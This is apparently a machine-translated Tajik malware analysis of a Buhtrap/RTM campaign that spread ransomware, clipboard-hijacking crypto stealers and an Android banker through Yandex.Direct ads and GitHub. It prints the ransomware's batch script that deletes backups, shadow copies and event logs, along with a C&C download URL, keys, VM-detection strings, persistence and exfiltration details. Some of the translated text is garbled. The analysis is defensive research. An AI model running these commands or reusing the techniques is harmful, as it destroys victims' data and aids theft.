Барои ҳадафи муҳосибон дар ҳамлаи киберӣ, шумо метавонед ҳуҷҷатҳои кориеро, ки онҳо дар интернет ҷустуҷӯ мекунанд, истифода баред. Ин тақрибан он чизест, ки як гурӯҳи киберӣ дар тӯли чанд моҳи охир анҷом дода, пушти дарҳои маълумро паҳн кардааст. и , инчунин рамзгузорон ва нармафзор барои дуздии cryptocurrencies. Аксари ҳадафҳо дар Русия ҷойгир шудаанд. Ҳамла тавассути ҷойгир кардани таблиғоти зараровар дар Yandex.Direct сурат гирифтааст. Қурбониёни эҳтимолӣ ба вебсайте равона карда шуданд, ки аз онҳо хоҳиш карда шуд, ки як файли зараровареро, ки ҳамчун қолаби ҳуҷҷат пинҳон карда шудааст, зеркашӣ кунанд. Яндекс пас аз огоҳии мо таблиғи зарароварро нест кард.
Рамзи сарчашмаи Buhtrap дар гузашта дар интернет фош шуда буд, то ҳар кас аз он истифода кунад. Мо дар бораи мавҷудияти рамзи RTM маълумот надорем.
Дар ин мақола мо ба шумо мегӯям, ки чӣ тавр ҳамлагарон бо истифода аз Yandex.Direct нармафзори зарароварро паҳн карда, онро дар GitHub ҷойгир кардаанд. Ин паём бо таҳлили техникии нармафзори зараровар ба анҷом мерасад.
Buhtrap ва RTM ба тиҷорат баргаштанд
Механизми паҳншавӣ ва қурбониён
Борҳои гуногуне, ки ба қурбониён расонида мешаванд, як механизми умумии паҳнкуниро доранд. Ҳама файлҳои зарароваре, ки ҳамлагарон сохтаанд, дар ду анбори гуногуни GitHub ҷойгир карда шуданд.
Одатан, анбор як файли зараровари зеркашишавандаро дар бар мегирад, ки зуд-зуд иваз мешуд. Азбаски GitHub ба шумо имкон медиҳад, ки таърихи тағиротро дар анбор дидан кунед, мо метавонем бубинем, ки кадом нармафзори зараровар дар як давраи муайян паҳн шудааст. Барои бовар кунонидани ҷабрдида ба зеркашии файли зараровар, вебсайти blanki-shabloni24[.]ru, ки дар расми боло нишон дода шудааст, истифода шудааст.
Тарҳрезии сайт ва тамоми номҳои файлҳои зараровар аз як консепсия – формаҳо, қолибҳо, шартномаҳо, намунаҳо ва ғайра пайравӣ мекунанд. Бо назардошти он, ки нармафзори Buhtrap ва RTM дар гузашта аллакай дар ҳамла ба муҳосибон истифода мешуданд, мо тахмин кардем, ки стратегия дар маъракаи нав ҳамин аст. Ягона савол ин аст, ки ҷабрдида чӣ гуна ба вебсайти ҳамлагарон ворид шудааст.
Сироят
Ҳадди ақал якчанд қурбониёни эҳтимолӣ, ки дар ин сайт ба охир расиданд, аз ҷониби таблиғоти шубҳанок ҷалб карда шуданд. Дар зер намунаи URL оварда шудааст:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Тавре ки шумо аз пайванд мебинед, баннер дар форуми қонунии муҳосибӣ bb.f2[.]kz гузошта шудааст. Бояд қайд кард, ки баннерҳо дар сайтҳои гуногун пайдо шуда, ҳамаашон як id-и маърака (blanki_rsya) доштанд ва бештар ба хидматрасонии муҳосибӣ ё кӯмаки ҳуқуқӣ алоқаманд буданд. URL нишон медиҳад, ки ҷабрдидаи эҳтимолӣ дархости "зеркашии шакли ҳисобнома-фактура" -ро истифода кардааст, ки фарзияи моро дар бораи ҳамлаҳои мақсаднок дастгирӣ мекунад. Дар зер сайтҳое ҳастанд, ки баннерҳо пайдо шудаанд ва дархостҳои ҷустуҷӯии мувофиқ.
- варақаи ҳисобнома-фактураро зеркашӣ кунед - bb.f2[.]kz
- намунаи шартнома - Ipopen[.]ru
- Намунаи шикояти ариза - 77метров[.]ру
- шакли шартнома - blank-dogovor-kupli-prodazhi[.]ru
- Намунаи аризаи судӣ - zen.yandex[.]ru
- намунаи шикоят - юрдай[.]ру
- Намунаи шаклҳои шартнома – Regforum[.]ru
- шакли шартнома – assistentus[.]ru
- намунаи шартномаи манзил - napravah[.]com
- намунаҳои шартномаҳои ҳуқуқӣ - avito[.]ru
Сомонаи blanki-shabloni24[.]ru шояд барои гузаштани арзёбии оддии визуалӣ танзим шуда бошад. Одатан, таблиғе, ки ба сайти касбӣ бо истинод ба GitHub ишора мекунад, чизи баръало бад ба назар намерасад. Илова бар ин, ҳамлагарон файлҳои зарароварро ба анбор танҳо дар муддати маҳдуд, эҳтимолан дар давоми маърака бор карданд. Аксар вақт, анбори GitHub дорои бойгонии холии zip ё файли холии EXE буд. Ҳамин тариқ, ҳамлагарон метавонистанд таблиғро тавассути Yandex.Direct дар сайтҳое паҳн кунанд, ки эҳтимолан муҳосибоне, ки дар посух ба дархостҳои мушаххаси ҷустуҷӯ омадаанд, дидан мекарданд.
Минбаъд, биёед ба борҳои гуногуне, ки бо ин роҳ тақсим карда мешаванд, бубинем.
Таҳлили борбардорӣ
Хронологияи тақсимот
Маъракаи шубҳанок дар охири моҳи октябри соли 2018 оғоз шуда, дар замони навиштан фаъол аст. Азбаски тамоми анбор дар GitHub дастрас буд, мо ҷадвали дақиқи паҳнкунии шаш оилаҳои гуногуни нармафзори зарароварро тартиб додем (ба расми зер нигаред). Мо сатреро илова кардем, ки нишон медиҳад, ки истиноди баннерӣ кай кашф шудааст, чуноне ки тавассути телеметрияи ESET чен карда шудааст, барои муқоиса бо таърихи git. Тавре ки шумо мебинед, ин бо мавҷудияти бор дар GitHub хуб алоқаманд аст. Тафовут дар охири моҳи февралро метавон бо он шарҳ дод, ки мо қисми таърихи тағиротро надорем, зеро анбор пеш аз он ки мо онро пурра ба даст орем, аз GitHub хориҷ карда шуд.
Расми 1. Хронологияи паҳнкунии нармафзори зараровар.
Шаҳодатномаҳои имзои код
Дар маърака якчанд сертификатҳо истифода мешуд. Баъзеҳо аз ҷониби зиёда аз як оилаи нармафзори зараровар имзо карда шудаанд, ки минбаъд нишон медиҳад, ки намунаҳои гуногун ба як маърака тааллуқ доранд. Сарфи назар аз мавҷудияти калиди хусусӣ, операторҳо ба таври муназзам ба дуӣ имзо нагузоштанд ва калидро барои ҳама намунаҳо истифода набурданд. Дар охири моҳи феврали соли 2019 ҳамлагарон бо истифода аз сертификати Google имзоҳои беэътибор эҷод карданд, ки барои онҳо калиди махфӣ надоштанд.
Ҳамаи сертификатҳое, ки дар маърака иштирок мекунанд ва оилаҳои нармафзори зараровар, ки онҳо имзо мекунанд, дар ҷадвали зер оварда шудаанд.
Мо инчунин ин шаҳодатномаҳои имзои кодро барои барқарор кардани робита бо дигар оилаҳои нармафзори зараровар истифода кардем. Барои аксари сертификатҳо, мо намунаҳоеро пайдо накардем, ки тавассути анбори GitHub паҳн нашудаанд. Бо вуҷуди ин, шаҳодатномаи TOV "MARIA" барои имзо кардани нармафзори зараровар ба ботнет истифода мешуд , воҳиди ва конканҳои. Ба гумон аст, ки ин нармафзори зараровар ба ин маърака алоқаманд бошад. Эҳтимол, сертификат дар darknet харида шудааст.
Win32/Filecoder.Buhtrap
Аввалин ҷузъе, ки диққати моро ба худ ҷалб кард, ин Win32/Filecoder.Buhtrap буд. Ин файли бинарии Delphi аст, ки баъзан бастабандӣ мешавад. Он асосан дар моҳҳои феврал-марти соли 2019 паҳн карда шуд. Он тавре рафтор мекунад, ки ба барномаи ransomware мувофиқ аст - он дискҳои маҳаллӣ ва ҷузвдонҳои шабакавиро ҷустуҷӯ мекунад ва файлҳои ошкоршударо рамзгузорӣ мекунад. Барои халалдор шудан ба он пайвасти интернет лозим нест, зеро он барои ирсоли калидҳои рамзгузорӣ бо сервер тамос намегирад. Ба ҷои ин, он ба охири паёми фидя "нишона" илова мекунад ва истифодаи почтаи электронӣ ё Bitmessage-ро барои тамос бо операторҳо пешниҳод мекунад.
Барои рамзгузории ҳарчи бештари захираҳои ҳассос, Filecoder.Buhtrap риштаеро иҷро мекунад, ки барои хомӯш кардани нармафзори калидӣ тарҳрезӣ шудааст, ки метавонад коркардкунандагони файлҳои кушодаи дорои маълумоти арзишманд, ки метавонад ба рамзгузорӣ халал расонад, дошта бошад. Равандҳои мақсаднок асосан системаҳои идоракунии пойгоҳи додаҳо (DBMS) мебошанд. Илова бар ин, Filecoder.Buhtrap файлҳои сабт ва нусхаҳои эҳтиётиро нест мекунад, то барқарорсозии маълумотро душвор созад. Барои ин кор, скрипти партияро дар зер иҷро кунед.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap хидмати қонунии онлайни IP Logger-ро истифода мебарад, ки барои ҷамъоварии маълумот дар бораи меҳмонони вебсайт пешбинӣ шудааст. Ин барои пайгирии қурбониёни нармафзори ransomware пешбинӣ шудааст, ки масъулияти сатри фармонро дорад:
mshta.exe "javascript:document.write('');"
Файлҳо барои рамзгузорӣ интихоб карда мешаванд, агар онҳо ба се рӯйхати истисно мувофиқат накунанд. Аввалан, файлҳои дорои васеъшавии зерин рамзгузорӣ карда намешаванд: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ва. .бат. Сониян, ҳамаи файлҳое, ки роҳи пурраи онҳо сатрҳои директория аз рӯйхати дар поён овардашударо дар бар мегирад, хориҷ карда мешаванд.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Сеюм, баъзе номҳои файлҳо низ аз рамзгузорӣ хориҷ карда мешаванд, дар байни онҳо номи файли паёми фидя. Рӯйхат дар поён оварда шудааст. Аён аст, ки ҳамаи ин истисноҳо барои нигоҳ доштани кори мошин пешбинӣ шудаанд, аммо бо ҳадди ақали қобили истифода.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Схемаи рамзгузории файл
Пас аз иҷро шудан, нармафзори зараровар як ҷуфт калиди 512-битии RSA тавлид мекунад. Пас аз он экспоненти хусусӣ (d) ва модули (n) бо калиди оммавии сахт-рамзи 2048-бит (экспонент ва модули оммавӣ), zlib печонидашуда ва рамзи base64 рамзгузорӣ карда мешавад. Рамзи масъули ин дар расми 2 нишон дода шудааст.
Тасвири 2. Натиҷаи декомпиляцияи Hex-Rays раванди тавлиди ҷуфтҳои калидҳои 512-битии RSA.
Дар зер намунаи матни оддӣ бо калиди хусусии тавлидшуда оварда шудааст, ки аломати ба паёми фидя замимашуда мебошад.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Калиди ҷамъиятии ҳамлагарон дар зер оварда шудааст.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Файлҳо бо истифода аз AES-128-CBC бо калиди 256-бит рамзгузорӣ карда мешаванд. Барои ҳар як файли рамзгузорӣ калиди нав ва вектори нави оғозёбӣ тавлид мешавад. Маълумоти калидӣ ба охири файли рамзгузорӣ илова карда мешавад. Биёед формати файли рамзшударо дида бароем.
Файлҳои рамзгузоришуда дорои сарлавҳаи зерин мебошанд:
Маълумоти файли манбаъ бо иловаи арзиши ҷодугарии VEGA ба байтҳои аввали 0x5000 рамзгузорӣ карда мешавад. Ҳама маълумоти рамзкушоӣ ба файл бо сохтори зерин замима карда мешаванд:
- Нишондиҳандаи андозаи файл дорои аломатест, ки андозаи он аз 0x5000 байт калонтар аст ё не
— Blob калиди AES = ZlibCompress(RSAEncrypt(Калиди AES + IV, калиди ҷамъиятии ҷуфти калидҳои тавлидшудаи RSA))
- Blob калиди RSA = ZlibCompress(RSAEncrypt (калиди хусусии RSA тавлидшуда, калиди оммавии сахт-кодшудаи RSA))
Win32/ClipBanker
Win32/ClipBanker як ҷузъест, ки аз охири моҳи октябр то аввали декабри соли 2018 фосилавӣ тақсим карда мешавад. Нақши он назорат кардани мундариҷаи буфер аст, он суроғаҳои ҳамёнҳои криптовалютаро ҷустуҷӯ мекунад. Бо муайян кардани суроғаи ҳамёни ҳадаф, ClipBanker онро бо суроғае иваз мекунад, ки гумон меравад ба операторҳо тааллуқ дорад. Намунаҳое, ки мо тафтиш кардем, на қуттӣ ва на печида буданд. Ягона механизме, ки барои ниқоб кардани рафтор истифода мешавад, рамзгузории сатр аст. Суроғаҳои ҳамёни оператор бо истифода аз RC4 рамзгузорӣ карда мешаванд. Криптовалютаҳои мақсаднок Bitcoin, Bitcoin cash, Dogecoin, Ethereum ва Ripple мебошанд.
Дар тӯли даврае, ки нармафзори зараровар ба ҳамёнҳои Bitcoin-и ҳамлагарон паҳн мешуд, ба VTS миқдори кам фиристода шуд, ки ба муваффақияти маърака шубҳа мекунад. Илова бар ин, ягон далеле вуҷуд надорад, ки ин муомилот умуман бо ClipBanker алоқаманд бошанд.
Win32/RTM
Ҷузъи Win32/RTM барои чанд рӯз дар аввали моҳи марти соли 2019 паҳн карда шуд. RTM як бонкдори троянист, ки дар Delphi навишта шудааст, ки ба системаҳои бонкии дурдаст нигаронида шудааст. Дар соли 2017 муҳаққиқони ESET нашр карданд аз ин барнома, тавсиф ҳанӯз ҳам муҳим аст. Дар моҳи январи соли 2019, Palo Alto Networks низ бароварда шуд .
Боркунаки Buhtrap
Муддате дар GitHub як зеркашӣкунанда мавҷуд буд, ки ба абзорҳои пешинаи Buhtrap монанд набуд. Ӯ рӯ меорад https://94.100.18[.]67/RSS.php?<some_id> барои гирифтани марҳилаи навбатӣ ва онро бевосита ба хотира бор мекунад. Мо метавонем ду рафтори рамзи марҳилаи дуюмро фарқ кунем. Дар URL-и аввал, RSS.php бевосита аз пушти дари Buhtrap гузашт - ин пушти дари пас аз фош шудани коди манбаъ хеле шабоҳат дорад.
Ҷолиб он аст, ки мо якчанд маъракаҳоро бо пушти дари Buhtrap мебинем ва гӯё онҳо аз ҷониби операторони гуногун идора мешаванд. Дар ин ҳолат, фарқияти асосӣ дар он аст, ки пушти дарвоза мустақиман ба хотира бор карда мешавад ва нақшаи муқаррариро бо раванди густариши DLL, ки мо дар бораи он сӯҳбат кардем, истифода намебарад. . Илова бар ин, операторон калиди RC4-ро барои рамзгузории трафики шабакавӣ ба сервери C&C иваз карданд. Дар аксари маъракаҳое, ки мо дидем, операторҳо дар иваз кардани ин калид ташвиш намедоданд.
Дуюм, рафтори мураккабтар ин буд, ки URL-и RSS.php ба боркунаки дигар интиқол дода шуд. Он баъзе нофаҳмиҳо, ба монанди барқарор кардани ҷадвали динамикии воридотро амалӣ кард. Мақсади пурборкунанда тамос бо сервери C&C мебошад [.]com/api/F27F84EDA4D13B15/2, гузоришҳоро фиристед ва посухро интизор шавед. Он посухро ҳамчун blob коркард мекунад, онро ба хотира бор мекунад ва иҷро мекунад. Сарбории пурборе, ки мо ҳангоми иҷрои ин боркунак дидем, ҳамон пушти дари Buhtrap буд, аммо шояд ҷузъҳои дигар вуҷуд дошта бошанд.
Android/Spy.Banker
Ҷолиб он аст, ки ҷузъе барои Android низ дар анбори GitHub ёфт шуд. Ӯ дар филиали асосӣ ҳамагӣ як рӯз – 1 ноябри соли 2018 буд. Ба ғайр аз интишори дар GitHub, телеметрии ESET ҳеҷ далели паҳн шудани ин нармафзори зарароварро намебинад.
Компонент ҳамчун бастаи барномаҳои Android (APK) ҷойгир карда шудааст. Он сахт печида аст. Рафтори шубҳанок дар JAR-и рамзгузоришуда, ки дар APK ҷойгир аст, пинҳон карда шудааст. Он бо RC4 бо истифода аз ин калид рамзгузорӣ шудааст:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Барои рамзгузории сатрҳо ҳамон калид ва алгоритм истифода мешаванд. JAR дар APK_ROOT + image/files. 4 байти аввали файл дарозии JAR-и рамзшударо дар бар мегирад, ки фавран пас аз майдони дарозӣ оғоз мешавад.
Пас аз рамзкушоӣ кардани файл, мо фаҳмидем, ки он Анубис аст - қаблан банкир барои Android. Барномаи зараровар дорои хусусиятҳои зерин аст:
- сабти микрофон
- гирифтани скриншотҳо
- гирифтани координатҳои GPS
- keylogger
- рамзгузории маълумоти дастгоҳ ва талаби фидя
- спам
Ҷолиб он аст, ки бонкир Twitter-ро ҳамчун канали эҳтиётии иртиботӣ барои ба даст овардани сервери дигари C&C истифода бурд. Намунае, ки мо таҳлил кардем, ҳисоби @JonesTrader-ро истифода бурд, аммо дар вақти таҳлил он аллакай баста шуда буд.
Бонк дорои рӯйхати барномаҳои мақсаднок дар дастгоҳи Android мебошад. Он аз рӯйхате, ки дар омӯзиши Софос гирифта шудааст, дарозтар аст. Дар ин рӯйхат барномаҳои зиёди бонкӣ, барномаҳои хариди онлайн, аз қабили Amazon ва eBay ва хидматҳои криптовалютӣ дохил мешаванд.
MSIL/ClipBanker.IH
Охирин ҷузъе, ки дар доираи ин маърака паҳн шудааст, иҷрошавандаи .NET Windows буд, ки моҳи марти соли 2019 пайдо шуд. Аксари версияҳои омӯхташуда бо ConfuserEx v1.0.0 баста шудаанд. Мисли ClipBanker, ин ҷузъ буферро истифода мебарад. Ҳадафи ӯ доираи васеи cryptocurrencies, инчунин пешниҳодҳо дар Steam мебошад. Илова бар ин, ӯ хидмати IP Logger-ро барои дуздидани калиди хусусии Bitcoin WIF истифода мебарад.
Механизмҳои муҳофизатӣ
Илова бар бартариҳое, ки ConfuserEx дар пешгирии хатогиҳо, демпинг ва таҳқир таъмин мекунад, ҷузъ қобилияти ошкор кардани маҳсулоти антивирус ва мошинҳои виртуалиро дар бар мегирад.
Барои тасдиқи он, ки он дар мошини маҷозӣ кор мекунад, зараровар сатри фармони Windows WMI (WMIC)-ро барои дархост кардани маълумоти BIOS истифода мебарад, аз ҷумла:
wmic bios
Сипас, барнома баромади фармонро таҳлил мекунад ва калимаҳои калидиро меҷӯяд: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Барои ошкор кардани маҳсулоти антивирус, нармафзори зараровар дархости Windows Management Instrumentation (WMI) ба Маркази Амнияти Windows бо истифода аз он мефиристад ManagementObjectSearcher API тавре ки дар зер нишон дода шудааст. Пас аз рамзкушоӣ аз base64 занг чунин менамояд:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Расми 3. Раванди муайянкунии маҳсулоти антивирус.
Илова бар ин, нармафзори зараровар тафтиш мекунад, ки оё , асбобест, ки аз ҳамлаҳои буферӣ муҳофизат мекунад ва агар иҷро шавад, ҳама риштаҳоро дар ин раванд боздошта, муҳофизатро ғайрифаъол мекунад.
Устуворӣ
Версияи нармафзори зараровар, ки мо омӯхтаем, худаш нусхабардорӣ мекунад %APPDATA%googleupdater.exe ва атрибути "пинҳон"-ро барои директорияи google муқаррар мекунад. Он гоҳ вай арзишро иваз мекунад SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell дар феҳристи Windows ва роҳ илова мекунад updater.exe. Ҳамин тавр, нармафзори зараровар ҳар боре, ки корбар ворид мешавад, иҷро карда мешавад.
Рафтори бадхоҳона
Мисли ClipBanker, нармафзори зараровар мундариҷаи буферро назорат мекунад ва суроғаҳои ҳамёни криптовалютаро меҷӯяд ва ҳангоми пайдо шудан онро бо яке аз суроғаҳои оператор иваз мекунад. Дар зер рӯйхати суроғаҳои мақсаднок дар асоси он чизе, ки дар код пайдо шудааст, оварда шудааст.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Барои ҳар як намуди суроға ифодаи муқаррарии мувофиқ мавҷуд аст. Қимати STEAM_URL барои ҳамла ба системаи Steam истифода мешавад, тавре ки аз ифодаи муқаррарӣ дида мешавад, ки барои муайян кардани буфер истифода мешавад:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Канали эксфилтратсия
Илова ба иваз кардани суроғаҳо дар буфер, нармафзори зараровар калидҳои хусусии WIF-и Bitcoin, Bitcoin Core ва Electrum Bitcoin ҳамёнҳоро ҳадаф қарор медиҳад. Барнома plogger.org-ро ҳамчун канали эксфилтратсия барои ба даст овардани калиди хусусии WIF истифода мебарад. Барои ин, операторҳо маълумоти калиди хусусиро ба сарлавҳаи User-Agent HTTP илова мекунанд, тавре ки дар зер нишон дода шудааст.
Тасвири 4. Консол IP Logger бо маълумоти баромад.
Операторҳо iplogger.org-ро барои хориҷ кардани ҳамёнҳо истифода накарданд. Эҳтимол онҳо аз сабаби маҳдудияти 255 аломат дар майдон ба усули дигар муроҷиат карданд User-Agentдар интерфейси веби IP Logger нишон дода мешавад. Дар намунаҳое, ки мо омӯхтаем, сервери дигари баромад дар тағирёбандаи муҳити зист нигоҳ дошта мешуд DiscordWebHook. Тааҷҷубовар аст, ки ин тағирёбандаи муҳити зист дар ягон ҷои код таъин карда нашудааст. Ин аз он шаҳодат медиҳад, ки нармафзори зараровар ҳанӯз дар ҳоли таҳия аст ва тағирёбанда ба мошини санҷишии оператор таъин шудааст.
Аломати дигаре ҳаст, ки барнома дар ҳоли таҳия аст. Файли дуӣ ду URL-и iplogger.org-ро дар бар мегирад ва ҳарду ҳангоми хориҷ кардани маълумот дархост карда мешаванд. Дар дархост ба яке аз ин URL-ҳо, арзиш дар майдони Referer пеш аз "DEV /" гузошта мешавад. Мо инчунин версияеро ёфтем, ки бо истифода аз ConfuserEx баста нашуда буд, қабулкунандаи ин URL DevFeedbackUrl ном дорад. Дар асоси номи тағирёбандаи муҳити зист, мо боварӣ дорем, ки операторҳо нақша доранд, ки хидмати қонунии Discord ва системаи боздоштани веби онро барои дуздии ҳамёнҳои криптовалютӣ истифода баранд.
хулоса
Ин маърака намунаи истифодаи хидматҳои таблиғотии қонунӣ дар ҳамлаҳои киберӣ мебошад. Нақша ба созмонҳои Русия нигаронида шудааст, аммо мо аз дидани чунин ҳамла бо истифода аз хидматҳои ғайрирусӣ ҳайрон намешавем. Барои роҳ надодан ба созиш, корбарон бояд ба эътибори манбаи нармафзори зеркашидаашон боварӣ дошта бошанд.
Рӯйхати пурраи нишондиҳандаҳои созиш ва атрибутҳои MITER ATT&CK дар ин ҷо дастрас аст .
Манбаъ: will.com